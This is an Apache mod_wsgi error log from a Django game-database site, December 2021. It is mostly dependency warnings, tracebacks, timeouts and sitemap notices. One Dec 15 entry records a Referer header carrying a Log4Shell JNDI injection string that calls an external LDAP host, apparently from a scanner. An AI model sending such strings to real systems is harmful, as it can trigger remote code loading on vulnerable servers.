[Fri Dec 10 02:43:35.883221 2021] [wsgi:error] [pid 274554:tid 140024507725568] [remote 54.36.149.57:56779] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:43:35.883271 2021] [wsgi:error] [pid 274554:tid 140024507725568] [remote 54.36.149.57:56779] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:43:35.883277 2021] [wsgi:error] [pid 274554:tid 140024507725568] [remote 54.36.149.57:56779]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 02:44:01.550177 2021] [wsgi:error] [pid 274849:tid 140024507725568] [remote 54.36.148.122:22439] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:44:01.550229 2021] [wsgi:error] [pid 274849:tid 140024507725568] [remote 54.36.148.122:22439] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:44:01.550233 2021] [wsgi:error] [pid 274849:tid 140024507725568] [remote 54.36.148.122:22439]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 02:44:22.144062 2021] [wsgi:error] [pid 275146:tid 140024507725568] [remote 185.191.171.37:4140] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 02:44:22.144143 2021] [wsgi:error] [pid 275146:tid 140024507725568] [remote 185.191.171.37:4140] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 02:44:22.144152 2021] [wsgi:error] [pid 275146:tid 140024507725568] [remote 185.191.171.37:4140]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 03:17:32.611797 2021] [wsgi:error] [pid 276837:tid 140024507725568] [remote 185.191.171.4:62234] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 03:17:32.611851 2021] [wsgi:error] [pid 276837:tid 140024507725568] [remote 185.191.171.4:62234] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 03:17:32.611856 2021] [wsgi:error] [pid 276837:tid 140024507725568] [remote 185.191.171.4:62234]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 03:17:55.948973 2021] [wsgi:error] [pid 277163:tid 140024440583936] [remote 185.191.171.43:33574] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 03:17:55.949036 2021] [wsgi:error] [pid 277163:tid 140024440583936] [remote 185.191.171.43:33574] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 03:17:55.949042 2021] [wsgi:error] [pid 277163:tid 140024440583936] [remote 185.191.171.43:33574]   __import__(dependency)
[Fri Dec 10 04:37:25.923851 2021] [wsgi:error] [pid 277172:tid 140024516118272] (70007)The timeout specified has expired: [client 36.233.42.100:63088] mod_wsgi (pid=277172): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 07:14:15.228680 2021] [wsgi:error] [pid 281060:tid 140024507725568] [remote 118.104.16.67:63971] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 07:14:15.228729 2021] [wsgi:error] [pid 281060:tid 140024507725568] [remote 118.104.16.67:63971] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 07:14:15.228748 2021] [wsgi:error] [pid 281060:tid 140024507725568] [remote 118.104.16.67:63971]   __import__(dependency)
[Fri Dec 10 07:30:09.826820 2021] [wsgi:error] [pid 281069:tid 140024314029824] [client 206.189.33.118:34154] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Fri Dec 10 07:30:15.465202 2021] [wsgi:error] [pid 281686:tid 140024507725568] [remote 185.191.171.11:38422] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 07:30:15.465254 2021] [wsgi:error] [pid 281686:tid 140024507725568] [remote 185.191.171.11:38422] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 07:30:15.465258 2021] [wsgi:error] [pid 281686:tid 140024507725568] [remote 185.191.171.11:38422]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 10 07:39:37.398266 2021] [wsgi:error] [pid 282144:tid 140024507725568] [remote 185.191.171.8:52276] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 10 07:39:37.398403 2021] [wsgi:error] [pid 282144:tid 140024507725568] [remote 185.191.171.8:52276] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 10 07:39:37.398410 2021] [wsgi:error] [pid 282144:tid 140024507725568] [remote 185.191.171.8:52276]   __import__(dependency)
[Sat Dec 11 00:00:07.470012 2021] [wsgi:error] [pid 282153:tid 140024297244416] [client 203.175.8.56:37134] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sat Dec 11 00:00:07.470494 2021] [wsgi:error] [pid 282154:tid 140024314029824] [client 206.189.33.118:57756] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sat Dec 11 00:00:14.398651 2021] [wsgi:error] [pid 294354:tid 140024507725568] [remote 185.191.171.44:30330] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sat Dec 11 00:00:14.398715 2021] [wsgi:error] [pid 294354:tid 140024507725568] [remote 185.191.171.44:30330] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sat Dec 11 00:00:14.398721 2021] [wsgi:error] [pid 294354:tid 140024507725568] [remote 185.191.171.44:30330]   __import__(dependency)
[Sun Dec 12 00:00:08.173024 2021] [wsgi:error] [pid 294364:tid 140024179844864] [client 203.175.8.56:33184] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sun Dec 12 00:00:08.173659 2021] [wsgi:error] [pid 294364:tid 140024389564160] [client 206.189.33.118:42842] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sun Dec 12 00:00:14.644011 2021] [wsgi:error] [pid 312475:tid 140024390227712] [remote 54.36.148.210:43227] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 12 00:00:14.644061 2021] [wsgi:error] [pid 312475:tid 140024390227712] [remote 54.36.148.210:43227] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 12 00:00:14.644066 2021] [wsgi:error] [pid 312475:tid 140024390227712] [remote 54.36.148.210:43227]   __import__(dependency)
[Sun Dec 12 05:59:04.268270 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Sun Dec 12 05:59:04.269072 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 12 05:59:04.462684 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Sun Dec 12 05:59:04.462733 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 12 05:59:04.856657 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Sun Dec 12 05:59:04.856715 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 12 05:59:08.259527 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Sun Dec 12 05:59:08.259588 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 12 05:59:08.303730 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Sun Dec 12 05:59:08.303791 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 12 05:59:08.416126 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Sun Dec 12 05:59:08.416188 2021] [wsgi:error] [pid 312475:tid 140024507725568] [remote 66.249.71.119:37068]   return paginator.Paginator(self._items(), self.limit)
[Mon Dec 13 00:00:06.786440 2021] [wsgi:error] [pid 312486:tid 140024516118272] [client 203.175.8.56:45660] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Mon Dec 13 00:00:06.786689 2021] [wsgi:error] [pid 312486:tid 140024112670464] [client 206.189.33.118:53692] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Mon Dec 13 00:00:23.193450 2021] [wsgi:error] [pid 333617:tid 140024457369344] [remote 185.191.171.23:31320] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 13 00:00:23.193498 2021] [wsgi:error] [pid 333617:tid 140024457369344] [remote 185.191.171.23:31320] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 13 00:00:23.193503 2021] [wsgi:error] [pid 333617:tid 140024457369344] [remote 185.191.171.23:31320]   __import__(dependency)
[Tue Dec 14 00:00:06.671522 2021] [wsgi:error] [pid 333633:tid 140024474154752] [client 206.189.33.118:34212] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Tue Dec 14 00:00:14.941655 2021] [wsgi:error] [pid 351895:tid 140024507725568] [remote 185.191.171.7:30086] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Tue Dec 14 00:00:14.941745 2021] [wsgi:error] [pid 351895:tid 140024507725568] [remote 185.191.171.7:30086] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Tue Dec 14 00:00:14.941754 2021] [wsgi:error] [pid 351895:tid 140024507725568] [remote 185.191.171.7:30086]   __import__(dependency)
[Tue Dec 14 12:03:09.200898 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Tue Dec 14 12:03:09.202285 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 14 12:03:09.384539 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Tue Dec 14 12:03:09.384675 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 14 12:03:09.724123 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Tue Dec 14 12:03:09.724168 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 14 12:03:12.577946 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Tue Dec 14 12:03:12.577992 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 14 12:03:12.617647 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Tue Dec 14 12:03:12.617697 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 14 12:03:12.692838 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Tue Dec 14 12:03:12.692882 2021] [wsgi:error] [pid 351895:tid 140024398620416] [remote 66.249.79.74:35811]   return paginator.Paginator(self._items(), self.limit)
[Tue Dec 14 20:05:19.095196 2021] [wsgi:error] [pid 351905:tid 140024364386048] (70007)The timeout specified has expired: [client 218.51.33.233:52391] mod_wsgi (pid=351905): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Tue Dec 14 20:05:24.313879 2021] [wsgi:error] [pid 351905:tid 140024280459008] (70007)The timeout specified has expired: [client 218.51.33.233:52396] mod_wsgi (pid=351905): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Wed Dec 15 00:00:07.148411 2021] [wsgi:error] [pid 351904:tid 140024516118272] [client 206.189.33.118:34406] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Wed Dec 15 00:04:17.158044 2021] [wsgi:error] [pid 370172:tid 140024507725568] [remote 185.191.171.37:7336] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 15 00:04:17.158082 2021] [wsgi:error] [pid 370172:tid 140024507725568] [remote 185.191.171.37:7336] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 15 00:04:17.158087 2021] [wsgi:error] [pid 370172:tid 140024507725568] [remote 185.191.171.37:7336]   __import__(dependency)
[Wed Dec 15 00:56:26.077913 2021] [wsgi:error] [pid 370403:tid 140024146241280] [client 194.5.73.6:44104] Received request requiring chunked transfer encoding, but optional support for chunked transfer encoding has not been enabled.: /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py, referer: ${jndi:ldap://divd-cd120a71fbd3d108b67350c8e1644bf5_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.x00.it/}
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 15 01:53:02.936930 2021] [wsgi:error] [pid 372784:tid 140024507725568] [remote 54.36.148.32:17087] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 15 01:53:02.936988 2021] [wsgi:error] [pid 372784:tid 140024507725568] [remote 54.36.148.32:17087] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 15 01:53:02.936995 2021] [wsgi:error] [pid 372784:tid 140024507725568] [remote 54.36.148.32:17087]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f7386c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 15 01:57:34.049920 2021] [wsgi:error] [pid 374213:tid 140024507725568] [remote 40.77.167.22:21632] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 15 01:57:34.049968 2021] [wsgi:error] [pid 374213:tid 140024507725568] [remote 40.77.167.22:21632] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 15 01:57:34.049973 2021] [wsgi:error] [pid 374213:tid 140024507725568] [remote 40.77.167.22:21632]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f737bc10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Wed Dec 15 02:00:10.453756 2021] [wsgi:error] [pid 374603:tid 140024507725568] [remote 206.189.33.118:36784] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Wed Dec 15 02:00:10.453808 2021] [wsgi:error] [pid 374603:tid 140024507725568] [remote 206.189.33.118:36784] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Wed Dec 15 02:00:10.453813 2021] [wsgi:error] [pid 374603:tid 140024507725568] [remote 206.189.33.118:36784]   __import__(dependency)
[Thu Dec 16 00:00:06.440872 2021] [wsgi:error] [pid 374871:tid 140024381171456] [client 206.189.33.118:35110] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Thu Dec 16 00:06:40.580537 2021] [wsgi:error] [pid 392482:tid 140024507725568] [remote 185.191.171.33:52388] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Thu Dec 16 00:06:40.580577 2021] [wsgi:error] [pid 392482:tid 140024507725568] [remote 185.191.171.33:52388] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Thu Dec 16 00:06:40.580582 2021] [wsgi:error] [pid 392482:tid 140024507725568] [remote 185.191.171.33:52388]   __import__(dependency)
[Fri Dec 17 00:00:07.619014 2021] [wsgi:error] [pid 405325:tid 140024381171456] [client 206.189.33.118:45078] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Fri Dec 17 00:02:44.817649 2021] [wsgi:error] [pid 412099:tid 140024507725568] [remote 185.191.171.34:13196] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 17 00:02:44.817706 2021] [wsgi:error] [pid 412099:tid 140024507725568] [remote 185.191.171.34:13196] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 17 00:02:44.817711 2021] [wsgi:error] [pid 412099:tid 140024507725568] [remote 185.191.171.34:13196]   __import__(dependency)
[Fri Dec 17 08:37:21.220750 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Fri Dec 17 08:37:21.222142 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 17 08:37:21.437521 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Fri Dec 17 08:37:21.437583 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 17 08:37:21.816465 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Fri Dec 17 08:37:21.816530 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 17 08:37:24.786112 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Fri Dec 17 08:37:24.786187 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 17 08:37:24.829012 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Fri Dec 17 08:37:24.829057 2021] [wsgi:error] [pid 412099:tid 140024407004928] [remote 66.249.79.74:54008]   return paginator.Paginator(self._items(), self.limit)
